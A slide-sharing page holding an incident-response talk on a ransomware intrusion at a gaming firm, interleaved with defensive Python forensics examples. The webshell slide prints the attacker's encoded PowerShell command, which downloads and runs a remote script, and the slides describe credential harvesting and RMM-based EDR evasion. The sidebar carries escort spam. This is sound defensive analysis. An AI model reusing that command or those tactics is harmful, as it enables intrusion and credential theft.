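    "/root/.bash_history": r"""cd /var/backups
echo 'root:T0pS3cret' | chpasswd
ls -la
""",
    "/opt/scripts/healthcheck.sh": r"""#!/bin/sh
# reads the secret from a 0600 file instead of embedding it (the safe pattern)
DB_PASS=$(cat /etc/healthcheck/db.pass)
curl -s -u "monitor:$DB_PASS" https://db01:8443/health
""",
}

# Only treat a bare "-p<value>" as a password when the line calls a CLI that uses it that way.
CLI_CONTEXT = re.compile(r"\b(?:mysql|mysqldump|mariadb|sshpass)\b")
PATTERNS = [
    ("literal password assignment",
     re.compile(r"""(?i)(?:pass(?:w(?:or)?d)?|pwd|secret|token)\s*[=:]\s*['"]?(?P<v>[^'"\s$]{4,})""")),
    ("inline -p password on a CLI call",
     re.compile(r"""(?:^|\s)-p(?P<v>[^\s'"$][^\s'"]*)""")),
    ("PowerShell plaintext SecureString",
     re.compile(r"""(?i)ConvertTo-SecureString\s+['"](?P<v>[^'"]+)['"]\s+-AsPlainText""")),
    ("chpasswd fed an inline credential",
     re.compile(r"""echo\s+['"]?(?P<u>[^:'"\s]+):(?P<v>[^'"\s]+)['"]?\s*\|\s*chpasswd""")),
]


def mask(secret: str) -> str:
    """Never copy the secret into the report: keep two characters for triage."""
    return secret[:2] + "*" * (len(secret) - 2)


def scan_text(path: str, text: str):
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, rx in PATTERNS:
            if kind.startswith("inline -p") and not CLI_CONTEXT.search(line):
                continue
            m = rx.search(line)
            if m:
                findings.append({"path": path, "line": lineno, "kind": kind,
                                 "secret": mask(m.group("v"))})
                break  # one finding per line is enough for a report
    return findings


def scan_files(files: dict):
    out = []
    for path, text in files.items():
        out.extend(scan_text(path, text))
    return out


if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f['path']}:{f['line']}  {f['kind']}  ({f['secret']})")
```

A variable reference such as `-p"$DB_PASS"` or `DB_PASS=$(cat …)` is deliberately not matched: the value is not in the file, which is exactly the practice the findings above argue for.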
Lessons Learned
It’s all about visibility… and a clean environment…
▪ The sophisticated nature of today’s threat landscape and actors continues to wreak havoc on enterprise infrastructures and, to our surprise, this happens to betting and online casino services more often than expected.
▪ Visibility is the key to protecting a network: actively looking for any security gap, vulnerability, on-going cyber attack, and any anomaly or wrong usage of network resources.
▪ The rule is “If you don’t find them, you can’t fix them”.
▪ Unfortunately, visibility is a major issue in the gaming industry.
▪ There could be several reasons why this is the case: the gaming industry may not understand the importance of network visibility, for example, or may lack the tools and resources to get started.
▪ In any case, the lack of adequate response from security teams is due to the dependency on perimeter-based security solutions that are not agile enough to deal with sophisticated threats, or to the limited spectrum of cybersecurity controls these companies enforce nowadays.
Visibility, Flexibility and Practice
[Diagram: three pillars: comprehensive visibility; preparedness (incident response retainer, major incident practice drills, cyber insurance, recovery planning); proactive detection and response together with reactive capabilities.]
THANKS!
 

Recently uploaded

CTAC 2024 Valencia - Sven Zoelle - Most Crucial Invest to Digitalisation_slid...
CTAC 2024 Valencia - Sven Zoelle - Most Crucial Invest to Digitalisation_slid...CTAC 2024 Valencia - Sven Zoelle - Most Crucial Invest to Digitalisation_slid...
CTAC 2024 Valencia - Sven Zoelle - Most Crucial Invest to Digitalisation_slid...henrik385807
 
George Lever - eCommerce Day Chile 2024
George Lever -  eCommerce Day Chile 2024George Lever -  eCommerce Day Chile 2024
George Lever - eCommerce Day Chile 2024eCommerce Institute
 
Mohammad_Alnahdi_Oral_Presentation_Assignment.pptx
Mohammad_Alnahdi_Oral_Presentation_Assignment.pptxMohammad_Alnahdi_Oral_Presentation_Assignment.pptx
Mohammad_Alnahdi_Oral_Presentation_Assignment.pptxmohammadalnahdi22
 
Exploring protein-protein interactions by Weak Affinity Chromatography (WAC) ...
Exploring protein-protein interactions by Weak Affinity Chromatography (WAC) ...Exploring protein-protein interactions by Weak Affinity Chromatography (WAC) ...
Exploring protein-protein interactions by Weak Affinity Chromatography (WAC) ...Salam Al-Karadaghi
 
Open Source Camp Kubernetes 2024 | Running WebAssembly on Kubernetes by Alex ...
Open Source Camp Kubernetes 2024 | Running WebAssembly on Kubernetes by Alex ...Open Source Camp Kubernetes 2024 | Running WebAssembly on Kubernetes by Alex ...
Open Source Camp Kubernetes 2024 | Running WebAssembly on Kubernetes by Alex ...NETWAYS
 
Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...
Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...
Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...Hasting Chen
 
call girls in delhi malviya nagar @9811711561@
call girls in delhi malviya nagar @9811711561@call girls in delhi malviya nagar @9811711561@
call girls in delhi malviya nagar @9811711561@vikas rana
 
Motivation and Theory Maslow and Murray pdf
Motivation and Theory Maslow and Murray pdfMotivation and Theory Maslow and Murray pdf
Motivation and Theory Maslow and Murray pdfakankshagupta7348026
 
CTAC 2024 Valencia - Henrik Hanke - Reduce to the max - slideshare.pdf
CTAC 2024 Valencia - Henrik Hanke - Reduce to the max - slideshare.pdfCTAC 2024 Valencia - Henrik Hanke - Reduce to the max - slideshare.pdf
CTAC 2024 Valencia - Henrik Hanke - Reduce to the max - slideshare.pdfhenrik385807
 
Open Source Camp Kubernetes 2024 | Monitoring Kubernetes With Icinga by Eric ...
Open Source Camp Kubernetes 2024 | Monitoring Kubernetes With Icinga by Eric ...Open Source Camp Kubernetes 2024 | Monitoring Kubernetes With Icinga by Eric ...
Open Source Camp Kubernetes 2024 | Monitoring Kubernetes With Icinga by Eric ...NETWAYS
 
Microsoft Copilot AI for Everyone - created by AI
Microsoft Copilot AI for Everyone - created by AIMicrosoft Copilot AI for Everyone - created by AI
Microsoft Copilot AI for Everyone - created by AITatiana Gurgel
 
Navi Mumbai Call Girls Service Pooja 9892124323 Real Russian Girls Looking Mo...
Navi Mumbai Call Girls Service Pooja 9892124323 Real Russian Girls Looking Mo...Navi Mumbai Call Girls Service Pooja 9892124323 Real Russian Girls Looking Mo...
Navi Mumbai Call Girls Service Pooja 9892124323 Real Russian Girls Looking Mo...Pooja Nehwal
 
No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...
No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...
No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...Sheetaleventcompany
 
Open Source Strategy in Logistics 2015_Henrik Hankedvz-d-nl-log-conference.pdf
Open Source Strategy in Logistics 2015_Henrik Hankedvz-d-nl-log-conference.pdfOpen Source Strategy in Logistics 2015_Henrik Hankedvz-d-nl-log-conference.pdf
Open Source Strategy in Logistics 2015_Henrik Hankedvz-d-nl-log-conference.pdfhenrik385807
 
OSCamp Kubernetes 2024 | SRE Challenges in Monolith to Microservices Shift at...
OSCamp Kubernetes 2024 | SRE Challenges in Monolith to Microservices Shift at...OSCamp Kubernetes 2024 | SRE Challenges in Monolith to Microservices Shift at...
OSCamp Kubernetes 2024 | SRE Challenges in Monolith to Microservices Shift at...NETWAYS
 
Night 7k Call Girls Noida Sector 128 Call Me: 8448380779
Night 7k Call Girls Noida Sector 128 Call Me: 8448380779Night 7k Call Girls Noida Sector 128 Call Me: 8448380779
Night 7k Call Girls Noida Sector 128 Call Me: 8448380779Delhi Call girls
 
OSCamp Kubernetes 2024 | Zero-Touch OS-Infrastruktur für Container und Kubern...
OSCamp Kubernetes 2024 | Zero-Touch OS-Infrastruktur für Container und Kubern...OSCamp Kubernetes 2024 | Zero-Touch OS-Infrastruktur für Container und Kubern...
OSCamp Kubernetes 2024 | Zero-Touch OS-Infrastruktur für Container und Kubern...NETWAYS
 
SaaStr Workshop Wednesday w: Jason Lemkin, SaaStr
SaaStr Workshop Wednesday w: Jason Lemkin, SaaStrSaaStr Workshop Wednesday w: Jason Lemkin, SaaStr
SaaStr Workshop Wednesday w: Jason Lemkin, SaaStrsaastr
 
ANCHORING SCRIPT FOR A CULTURAL EVENT.docx
ANCHORING SCRIPT FOR A CULTURAL EVENT.docxANCHORING SCRIPT FOR A CULTURAL EVENT.docx
ANCHORING SCRIPT FOR A CULTURAL EVENT.docxNikitaBankoti2
 
Call Girl Number in Khar Mumbai📲 9892124323 💞 Full Night Enjoy
Call Girl Number in Khar Mumbai📲 9892124323 💞 Full Night EnjoyCall Girl Number in Khar Mumbai📲 9892124323 💞 Full Night Enjoy
Call Girl Number in Khar Mumbai📲 9892124323 💞 Full Night EnjoyPooja Nehwal
 

Recently uploaded (20)

CTAC 2024 Valencia - Sven Zoelle - Most Crucial Invest to Digitalisation_slid...
CTAC 2024 Valencia - Sven Zoelle - Most Crucial Invest to Digitalisation_slid...CTAC 2024 Valencia - Sven Zoelle - Most Crucial Invest to Digitalisation_slid...
CTAC 2024 Valencia - Sven Zoelle - Most Crucial Invest to Digitalisation_slid...
 
George Lever - eCommerce Day Chile 2024
George Lever -  eCommerce Day Chile 2024George Lever -  eCommerce Day Chile 2024
George Lever - eCommerce Day Chile 2024
 
Mohammad_Alnahdi_Oral_Presentation_Assignment.pptx
Mohammad_Alnahdi_Oral_Presentation_Assignment.pptxMohammad_Alnahdi_Oral_Presentation_Assignment.pptx
Mohammad_Alnahdi_Oral_Presentation_Assignment.pptx
 
Exploring protein-protein interactions by Weak Affinity Chromatography (WAC) ...
Exploring protein-protein interactions by Weak Affinity Chromatography (WAC) ...Exploring protein-protein interactions by Weak Affinity Chromatography (WAC) ...
Exploring protein-protein interactions by Weak Affinity Chromatography (WAC) ...
 
Open Source Camp Kubernetes 2024 | Running WebAssembly on Kubernetes by Alex ...
Open Source Camp Kubernetes 2024 | Running WebAssembly on Kubernetes by Alex ...Open Source Camp Kubernetes 2024 | Running WebAssembly on Kubernetes by Alex ...
Open Source Camp Kubernetes 2024 | Running WebAssembly on Kubernetes by Alex ...
 
Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...
Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...
Re-membering the Bard: Revisiting The Compleat Wrks of Wllm Shkspr (Abridged)...
 
call girls in delhi malviya nagar @9811711561@
call girls in delhi malviya nagar @9811711561@call girls in delhi malviya nagar @9811711561@
call girls in delhi malviya nagar @9811711561@
 
Motivation and Theory Maslow and Murray pdf
Motivation and Theory Maslow and Murray pdfMotivation and Theory Maslow and Murray pdf
Motivation and Theory Maslow and Murray pdf
 
CTAC 2024 Valencia - Henrik Hanke - Reduce to the max - slideshare.pdf
CTAC 2024 Valencia - Henrik Hanke - Reduce to the max - slideshare.pdfCTAC 2024 Valencia - Henrik Hanke - Reduce to the max - slideshare.pdf
CTAC 2024 Valencia - Henrik Hanke - Reduce to the max - slideshare.pdf
 
Open Source Camp Kubernetes 2024 | Monitoring Kubernetes With Icinga by Eric ...
Open Source Camp Kubernetes 2024 | Monitoring Kubernetes With Icinga by Eric ...Open Source Camp Kubernetes 2024 | Monitoring Kubernetes With Icinga by Eric ...
Open Source Camp Kubernetes 2024 | Monitoring Kubernetes With Icinga by Eric ...
 
Microsoft Copilot AI for Everyone - created by AI
Microsoft Copilot AI for Everyone - created by AIMicrosoft Copilot AI for Everyone - created by AI
Microsoft Copilot AI for Everyone - created by AI
 
Navi Mumbai Call Girls Service Pooja 9892124323 Real Russian Girls Looking Mo...
Navi Mumbai Call Girls Service Pooja 9892124323 Real Russian Girls Looking Mo...Navi Mumbai Call Girls Service Pooja 9892124323 Real Russian Girls Looking Mo...
Navi Mumbai Call Girls Service Pooja 9892124323 Real Russian Girls Looking Mo...
 
No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...
No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...
No Advance 8868886958 Chandigarh Call Girls , Indian Call Girls For Full Nigh...
 
Open Source Strategy in Logistics 2015_Henrik Hankedvz-d-nl-log-conference.pdf
Open Source Strategy in Logistics 2015_Henrik Hankedvz-d-nl-log-conference.pdfOpen Source Strategy in Logistics 2015_Henrik Hankedvz-d-nl-log-conference.pdf
Open Source Strategy in Logistics 2015_Henrik Hankedvz-d-nl-log-conference.pdf
 
OSCamp Kubernetes 2024 | SRE Challenges in Monolith to Microservices Shift at...
OSCamp Kubernetes 2024 | SRE Challenges in Monolith to Microservices Shift at...OSCamp Kubernetes 2024 | SRE Challenges in Monolith to Microservices Shift at...
OSCamp Kubernetes 2024 | SRE Challenges in Monolith to Microservices Shift at...
 
Night 7k Call Girls Noida Sector 128 Call Me: 8448380779
Night 7k Call Girls Noida Sector 128 Call Me: 8448380779Night 7k Call Girls Noida Sector 128 Call Me: 8448380779
Night 7k Call Girls Noida Sector 128 Call Me: 8448380779
 
OSCamp Kubernetes 2024 | Zero-Touch OS-Infrastruktur für Container und Kubern...
OSCamp Kubernetes 2024 | Zero-Touch OS-Infrastruktur für Container und Kubern...OSCamp Kubernetes 2024 | Zero-Touch OS-Infrastruktur für Container und Kubern...
OSCamp Kubernetes 2024 | Zero-Touch OS-Infrastruktur für Container und Kubern...
 
SaaStr Workshop Wednesday w: Jason Lemkin, SaaStr
SaaStr Workshop Wednesday w: Jason Lemkin, SaaStrSaaStr Workshop Wednesday w: Jason Lemkin, SaaStr
SaaStr Workshop Wednesday w: Jason Lemkin, SaaStr
 
ANCHORING SCRIPT FOR A CULTURAL EVENT.docx
ANCHORING SCRIPT FOR A CULTURAL EVENT.docxANCHORING SCRIPT FOR A CULTURAL EVENT.docx
ANCHORING SCRIPT FOR A CULTURAL EVENT.docx
 
Call Girl Number in Khar Mumbai📲 9892124323 💞 Full Night Enjoy
Call Girl Number in Khar Mumbai📲 9892124323 💞 Full Night EnjoyCall Girl Number in Khar Mumbai📲 9892124323 💞 Full Night Enjoy
Call Girl Number in Khar Mumbai📲 9892124323 💞 Full Night Enjoy
 

Insert coin to continue - Ransomware in the gaming industry.pdf

1. "Insert coin to continue..." Ransomware in the gaming industry
Stefano Maccaglia, Practice Manager, Incident Response
©2022 NetWitness or its affiliates. All rights reserved.
2. Who I Am: Stefano
• I am the Practice Manager of the Netwitness (RSA) Incident Response.
• I began my ICT career in 1997 in Digital Corp, but I started to crack software in 1985 with a Commodore C64.
• I decided to get out of the cracking scene in 2000 to focus on networking… until Nimda and Blaster came out and cybersecurity became an interesting career…
• I worked on the offensive side until 2009, when I jumped on the IR bandwagon.
• Since then, I have led engagements around the world covering investigations of sophisticated actors.
3. Agenda
❑ Introduction
❑ The first case
  ❑ Initial Compromise
  ❑ Second Phase, Second Actor
  ❑ Third Phase
  ❑ Ransomware in play
  ❑ The outcome
❑ The second case
  ❑ Exotic Lily + Conti…
❑ Enablers of compromise
❑ Lessons learned
4. The First Case
5. Initial Compromise
▪ Through an active exploit of the Exchange web server, two webshells (Logout.aspx and iisstart.aspx) were uploaded to DC1-EXCH01 on December 9, 2021.
▪ The Exchange server version was 2019 CU10. CVE-2021-42321 is fixed by the November 2021 Security Update for Exchange 2019 CU10/CU11 (and 2016 CU21/CU22), so the CU level alone does not tell you whether a server is exposed; check which Security Update is installed.
[Diagram: MUNICH Data Center with DC1-EXCH00 and DC1-EXCH01; attacker source 23.183.81.113; webshells Logout.aspx and iisstart.aspx on DC1-EXCH01]
6. Evidence of Initial Attack
▪ The proximity of the file creation times (a few milliseconds apart) in different paths confirms that the webshells were dropped by an exploit with chained payloads: no operator creates two files in two directories that close together by hand.
▪ Web log retention on the server was 30 days, so the logs had rolled over before the investigation started, but the webshells were likely uploaded via CVE-2021-42321, an RCE, based on the folders used to drop them.
[Figure: the two webshell files. First webshell: basic loader. Second webshell: functions to interact with files. Both carry timestomped dates.]
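The two checks the slide relies on, creation-time proximity across directories and timestomping, as an added example that is not part of the deck. It works on records in the shape of a parsed $MFT export; the field names (path, si_created for the $STANDARD_INFORMATION creation time, fn_created for the $FILE_NAME creation time), the paths and the times are constructed, not the case data. The $FILE_NAME time is used for clustering because user-mode timestomping tools rewrite $STANDARD_INFORMATION but not $FILE_NAME, which is also why an SI creation time older than the FN one is a red flag.

```python
"""Triage of a suspected webshell drop from NTFS timestamps (added example)."""
from datetime import datetime, timedelta

# Constructed sample (paths and times are invented, not the case data):
# two .aspx files 4.5 ms apart in different web folders, the second with its
# SI creation time pushed back to 2018, plus an unrelated older file.
SAMPLE_MFT = [
    {"path": r"C:\inetpub\wwwroot\a\Logout.aspx",
     "si_created": "2021-12-09T10:15:32.418200",
     "fn_created": "2021-12-09T10:15:32.418200"},
    {"path": r"C:\inetpub\wwwroot\b\iisstart.aspx",
     "si_created": "2018-05-01T00:00:00.000000",
     "fn_created": "2021-12-09T10:15:32.422700"},
    {"path": r"C:\inetpub\wwwroot\a\legit.aspx",
     "si_created": "2021-06-14T08:00:01.123456",
     "fn_created": "2021-06-14T08:00:01.123456"},
]


def _dt(value):
    return datetime.fromisoformat(value)


def timestomp_indicators(rec):
    """Reasons to suspect the SI timestamps were rewritten (empty list = clean)."""
    si, fn = _dt(rec["si_created"]), _dt(rec["fn_created"])
    reasons = []
    if si < fn:
        reasons.append("SI created precedes FN created")
    if si.microsecond == 0:
        # SetFileTime-based stompers usually write whole seconds; NTFS keeps 100 ns.
        reasons.append("SI created has a zero sub-second component")
    return reasons


def creation_clusters(records, window_ms=50):
    """Groups of files whose FN creation times fall within window_ms of the
    previous file and that span at least two directories."""
    ordered = sorted(records, key=lambda r: _dt(r["fn_created"]))
    window = timedelta(milliseconds=window_ms)
    clusters, current = [], []
    for rec in ordered:
        if current and _dt(rec["fn_created"]) - _dt(current[-1]["fn_created"]) > window:
            clusters.append(current)
            current = []
        current.append(rec)
    if current:
        clusters.append(current)
    keep = []
    for cluster in clusters:
        dirs = {r["path"].rsplit("\\", 1)[0].lower() for r in cluster}
        if len(cluster) >= 2 and len(dirs) >= 2:
            keep.append(cluster)
    return keep


def triage(records, window_ms=50):
    """Combine both checks into a list of findings."""
    findings = []
    for cluster in creation_clusters(records, window_ms):
        span = _dt(cluster[-1]["fn_created"]) - _dt(cluster[0]["fn_created"])
        findings.append({"type": "creation burst",
                         "files": [r["path"] for r in cluster],
                         "span_ms": span.total_seconds() * 1000})
    for rec in records:
        reasons = timestomp_indicators(rec)
        if reasons:
            findings.append({"type": "timestomp", "file": rec["path"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_MFT):
        print(finding)
```

Feed it the output of any $MFT parser that exposes both timestamp sets; a 50 ms window is tight enough to single out exploit chains while ignoring ordinary deployments.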
7. CVE-2021-42321 in action
▪ The remote code execution vulnerability is due to improper validation of cmdlet (command-let) arguments.
▪ To exploit this flaw an attacker must be authenticated. The attack requires a chain of four POST requests against Exchange with an authenticated user to succeed.
8. We never leaked credentials…
▪ The attacker authenticated by leveraging the leaked credentials of a subcontractor working as a developer in the environment.
"Yeah that account is mine, but it is a personal account… what's the meaning of this?... And how did you collect it???"
9. Logout.aspx Webshell
▪ This webshell is extremely simple: it runs inside the IIS worker process (w3wp.exe), which spawns the command processor (cmd.exe), which in turn launches PowerShell (powershell.exe or pwsh.exe) with an encoded command:
  "cmd.exe" /c powershell -ep bypass -e SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLmRvd25sb2Fkc3RyaW5nKCdodHRwOi8vd3d3Lmt1bmlwdGlraWt5LmluZm8vcD9lJyk=
▪ Decoded: IEX (New-Object Net.WebClient).downloadstring('http://www.kuniptikiky.info/p?e')
▪ The payload downloads a second-stage script from www.kuniptikiky.info and runs it through Invoke-Expression (IEX) without writing the script to disk; -ep bypass disables the execution policy for that process.
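A decoder for the -e / -EncodedCommand argument, as an added example (not the deck's own code). One caveat a practitioner should know: PowerShell expects the argument to be base64 of the script encoded as UTF-16LE, while the string on the slide decodes as plain ASCII base64, so it was evidently re-encoded for display. The decoder below tries the real format first and falls back, and pulls download URLs out of the result with a regular expression whose list of download verbs is an assumption.

```python
"""Decode a `powershell -EncodedCommand` argument and extract download URLs."""
import base64
import re
import string

PRINTABLE = set(string.printable)

# The string from the Logout.aspx slide (the space inserted by the slide layout removed).
SLIDE_B64 = ("SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLmRvd25sb2Fkc3RyaW5nKCdodHRw"
             "Oi8vd3d3Lmt1bmlwdGlraWt5LmluZm8vcD9lJyk=")

# Download verbs to look for; the list is an assumption, extend it as needed.
DOWNLOAD_RE = re.compile(
    r"""(?:downloadstring|downloadfile|Invoke-WebRequest|iwr|curl|wget)\s*\(?\s*['"]([^'"]+)['"]""",
    re.I)


def encode_for_powershell(script):
    """Build a genuine -EncodedCommand argument: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64):
    """Return (script, encoding). encoding is 'utf-16-le' for a real
    -EncodedCommand blob, 'utf-8' for a sample that was re-encoded as plain text."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    if len(raw) % 2 == 0:
        text = raw.decode("utf-16-le", errors="replace")
        # ASCII bytes read as UTF-16LE turn into CJK-looking code points, so a
        # fully printable result means the blob really was UTF-16LE.
        if text and all(ch in PRINTABLE for ch in text):
            return text, "utf-16-le"
    return raw.decode("utf-8", errors="replace"), "utf-8"


def extract_urls(script):
    """URLs passed to the common download primitives."""
    return DOWNLOAD_RE.findall(script)


if __name__ == "__main__":
    script, encoding = decode_encoded_command(SLIDE_B64)
    print(encoding, script)
    print(extract_urls(script))
```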
10. Webshell Logic of iisstart.aspx
▪ The second webshell lets the attacker interact with the system through requests carrying the parameter cadataKey; everything passed in this parameter is executed through an eval statement.
▪ If the cadataKey parameter is absent, the webshell redirects to the errorFE.aspx page and returns HTTP 404, so a request without the key looks like a missing page.
▪ The webshell included the ability to run arbitrary commands and to upload, delete, and view the contents of files.
▪ Once implanted, the webshell gave the attacker access to the environment with local administrative rights.
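A hunt for these two webshells in IIS W3C logs, as an added example that is not part of the deck. The file names and the cadataKey parameter come from the slides; the log lines are constructed. Two things worth keeping in mind: IIS logs the query string only, so a cadataKey sent in a POST body never appears and requests to the file names have to be flagged on their own, and a GET without the key legitimately returns 404 (exactly as the slide describes), so a 404 on an unexpected .aspx file is not a reason to drop the hit.

```python
"""Hunt for the iisstart.aspx / Logout.aspx webshells in IIS W3C logs."""
from urllib.parse import parse_qs

WEBSHELL_NAMES = {"logout.aspx", "iisstart.aspx"}   # from the deck
WEBSHELL_PARAM = "cadatakey"                         # from the deck, compared case-insensitively

# Constructed log excerpt (documentation IP ranges, invented paths).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2021-12-10 03:12:44 10.1.2.15 GET /owa/auth/logon.aspx url=https://mail.example.test/owa/ 443 - 203.0.113.7 Mozilla/5.0 200 0 0 120
2021-12-10 03:13:01 10.1.2.15 POST /aspnet_client/iisstart.aspx cadataKey=d2hvYW1p 443 - 203.0.113.7 python-requests/2.26.0 200 0 0 35
2021-12-10 03:13:09 10.1.2.15 GET /aspnet_client/iisstart.aspx - 443 - 198.51.100.9 Mozilla/5.0 404 0 0 3
2021-12-10 03:14:20 10.1.2.15 POST /aspnet_client/Logout.aspx - 443 - 203.0.113.7 python-requests/2.26.0 200 0 0 4100
"""


def parse_w3c(text):
    """Turn a W3C extended log into dicts keyed by the #Fields header."""
    fields, rows = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue
        rows.append(dict(zip(fields, line.split())))
    return rows


def webshell_hits(rows):
    """Requests to the known webshell file names or carrying cadataKey."""
    hits = []
    for row in rows:
        reasons = []
        stem = row.get("cs-uri-stem", "")
        if stem.rsplit("/", 1)[-1].lower() in WEBSHELL_NAMES:
            reasons.append("request to known webshell file name")
        query = row.get("cs-uri-query", "-")
        if query != "-":
            names = {k.lower() for k in parse_qs(query, keep_blank_values=True)}
            if WEBSHELL_PARAM in names:
                reasons.append("cadataKey parameter in query string")
        if reasons:
            hits.append({"time": f'{row["date"]} {row["time"]}',
                         "client": row.get("c-ip"),
                         "method": row.get("cs-method"),
                         "uri": stem,
                         "status": row.get("sc-status"),
                         "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in webshell_hits(parse_w3c(SAMPLE_LOG)):
        print(hit)
```

Run it over the whole retention window you still have; the slide's point about 30-day retention is that the initial drop had already aged out, so the useful hits are the later interactive ones.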
11. Second Phase, Second Actor
12. Second Phase, Second Actor
▪ On February 18, 2022, the attacker uploaded a file named lsass.dll to DC1-EXCH00 and, a few minutes later, to DC1-EXCH01.
▪ This malicious DLL is loaded into processes on the server and harvests cleartext passwords in real time as users authenticate to the Exchange server.
▪ The long pause between the initial webshells (December 9, 2021) and this activity could be due to the initial attacker selling access to the ransomware attacker.
[Diagram: MUNICH Data Center; attacker 23.183.81.113; iisstart.aspx and lsass.dll on the Exchange servers DC1-EXCH00 and DC1-EXCH01]
13. Second Phase, Second Actor
▪ The harvested credentials are saved into a file named C:\windows\temp\tmpQWER.tmp, recorded as user and password.
▪ Hundreds of cleartext passwords were harvested.
▪ This file was subsequently uploaded to several other servers, including several domain controllers.
▪ The DLL uses the NPLogonNotify API provided by Microsoft to extract the cleartext credentials of users as they log into the servers. NPLogonNotify is the notification Windows sends to registered network providers when a user logs on, and it hands the provider the logon credentials, password included, so the DLL does not need to read the memory of the LSASS process at all.
[Diagram: MUNICH Data Center; iisstart.aspx and lsass.dll on DC1-EXCH00 and DC1-EXCH01, each writing C:\windows\temp\tmpQWER.tmp]
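Because a DLL only receives NPLogonNotify if it is registered as a network provider, the registration itself is the thing to audit: a service key with a NetworkProvider subkey (ProviderPath, Name) and the service name listed in HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order\ProviderOrder. The deck does not show how this case's lsass.dll was registered, so the check below, an added example and not the deck's tooling, simply flags any provider that is not one of the in-box ones (the short list of in-box providers is an assumption kept deliberately small). The live collector needs Windows (stdlib winreg); the constructed sample, whose "ExchSync" entry is invented, lets the logic run anywhere.

```python
r"""Audit Windows network providers, the registration a DLL needs for NPLogonNotify."""
import ntpath

# In-box providers and the DLL each should point at (lowercase service name -> basename).
KNOWN = {
    "lanmanworkstation": "ntlanman.dll",
    "rdpnp": "drprov.dll",
    "webclient": "davclnt.dll",
}

# Constructed sample; the last entry is an invented malicious registration.
SAMPLE_PROVIDERS = {
    "RDPNP": {"ProviderPath": r"%SystemRoot%\System32\drprov.dll",
              "Name": "Microsoft Remote Desktop Session Host Server Network Provider"},
    "LanmanWorkstation": {"ProviderPath": r"%SystemRoot%\System32\ntlanman.dll",
                          "Name": "Microsoft Windows Network"},
    "webclient": {"ProviderPath": r"%SystemRoot%\System32\davclnt.dll",
                  "Name": "Web Client Network"},
    "ExchSync": {"ProviderPath": r"C:\Windows\Temp\lsass.dll",
                 "Name": "Exchange Sync Provider"},
}


def collect_providers_live():
    """Read the real registry on a Windows host, in ProviderOrder order."""
    import winreg
    hklm = winreg.HKEY_LOCAL_MACHINE
    with winreg.OpenKey(hklm, r"SYSTEM\CurrentControlSet\Control\NetworkProvider\Order") as key:
        order = winreg.QueryValueEx(key, "ProviderOrder")[0]
    providers = {}
    for svc in order.split(","):
        sub = r"SYSTEM\CurrentControlSet\Services\%s\NetworkProvider" % svc
        try:
            with winreg.OpenKey(hklm, sub) as key:
                providers[svc] = {"ProviderPath": winreg.QueryValueEx(key, "ProviderPath")[0],
                                  "Name": winreg.QueryValueEx(key, "Name")[0]}
        except OSError:
            providers[svc] = {"ProviderPath": None, "Name": None}
    return providers


def audit_providers(providers):
    """One finding per provider that does not look like an in-box one."""
    findings = []
    for svc, info in providers.items():
        path = info.get("ProviderPath") or ""
        expected = KNOWN.get(svc.lower())
        if expected is None:
            reason = "not an in-box provider"
        elif ntpath.basename(path).lower() != expected:
            reason = "ProviderPath differs from in-box DLL"
        elif "\\system32\\" not in path.lower():
            reason = "in-box DLL name outside System32"
        else:
            continue
        findings.append({"service": svc, "path": path, "name": info.get("Name"), "reason": reason})
    return findings


if __name__ == "__main__":
    import sys
    data = collect_providers_live() if sys.platform == "win32" else SAMPLE_PROVIDERS
    for finding in audit_providers(data):
        print(finding)
```

Third-party software (VPN clients, file-system drivers) legitimately registers providers too, so treat a finding as a lead to verify by signature and vendor rather than a verdict.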
14. Second Phase, Second Actor
▪ On 18 February 2022 the attacker also uploaded the first instance of the Atera agent and Splashtop (a remote desktop tool) to DC1-EXCH00.
▪ Atera is an IT management solution that enables monitoring, management, and automation of IT networks from a single console.
[Diagram: MUNICH Data Center; attacker 23.183.81.113; iisstart.aspx, lsass.dll and atera.exe on DC1-EXCH00; iisstart.aspx on DC1-EXCH01]
15. How to Avoid Generic Detection: Atera
▪ The idea behind this tactic is to leverage a legitimate remote management agent (like Atera) to survive possible Cobalt Strike detections by the EDR and antivirus platforms: a signed, commercially supported agent is rarely flagged, and it keeps the attacker's channel open even if the beacon or the webshell is found and removed.
▪ Relying upon a legitimate tool to achieve persistence is typically a pen tester's approach, and in my personal perspective this can clarify the attacker's background.
16. How to Complete the Job…
▪ The attacker then resumed activity on 11 March 2022.
▪ The Atera package was uploaded to the domain controller of the targeted data center (DC1-DC0001) together with the credential harvester lsass.dll.
[Diagram: MUNICH Data Center; attacker 23.183.81.113; webshell, lsass.dll and atera.exe on DC1-EXCH00; lsass.dll and atera.exe on DC1-DC0001]
